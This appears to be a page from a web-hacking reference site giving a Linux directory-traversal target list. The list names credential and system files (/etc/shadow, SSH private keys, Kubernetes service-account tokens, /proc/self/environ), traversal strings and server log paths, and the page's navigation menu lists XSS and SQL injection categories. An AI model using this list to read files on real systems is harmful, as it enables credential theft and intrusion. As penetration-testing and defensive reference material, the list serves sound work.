/etc/issue /etc/passwd /etc/shadow /etc/group /etc/hosts /etc/motd /etc/mysql/my.cnf /proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor) /proc/self/environ /proc/version /proc/cmdline /proc/sched_debug /proc/mounts /proc/net/arp /proc/net/route /proc/net/tcp /proc/net/udp /proc/self/cwd/index.php /proc/self/cwd/main.py /home/$USER/.bash_history /home/$USER/.ssh/id_rsa /run/secrets/kubernetes.io/serviceaccount/token /run/secrets/kubernetes.io/serviceaccount/namespace /run/secrets/kubernetes.io/serviceaccount/certificate /var/run/secrets/kubernetes.io/serviceaccount /var/lib/mlocate/mlocate.db /var/lib/mlocate.db /../../ ////////../../ /var/log/apache/access.log /var/log/apache/error.log /var/log/httpd/error_log /usr/local/apache/log/error_log /usr/local/apache2/log/error_log /var/log/nginx/access.log /var/log/nginx/error.log /var/log/vsftpd.log /var/log/sshd.log /var/log/mail
- Home
- Attack Vectors
- _XSS
- __Reflected XSS
- __Persistent XSS
- _DOM XSS
- __DOM XSS
- __CSS Injection
- __HTML Injection
- __JavaScript Execution
- _SQL
- __Generic SQLi
- __Generic Blind SQLi
- __Generic Error Based SQLi
- __Generic Time Based SQLi
- __Generic Union Select SQLi
- __Authentication Bypass SQLi
- _Directory Traversal
- __Generic
- __Linux
- __Windows
- _HTTP Verbs
- _Input Validation
- Download Resources
- _PDF
- Top Web Hacking Techniques
- _2024
- __Double Clickjacking Vulnerability
- External Resources
- _URL Encoder/Decoder
- _Hacking Tools
- About
- Contact Us
0 Comments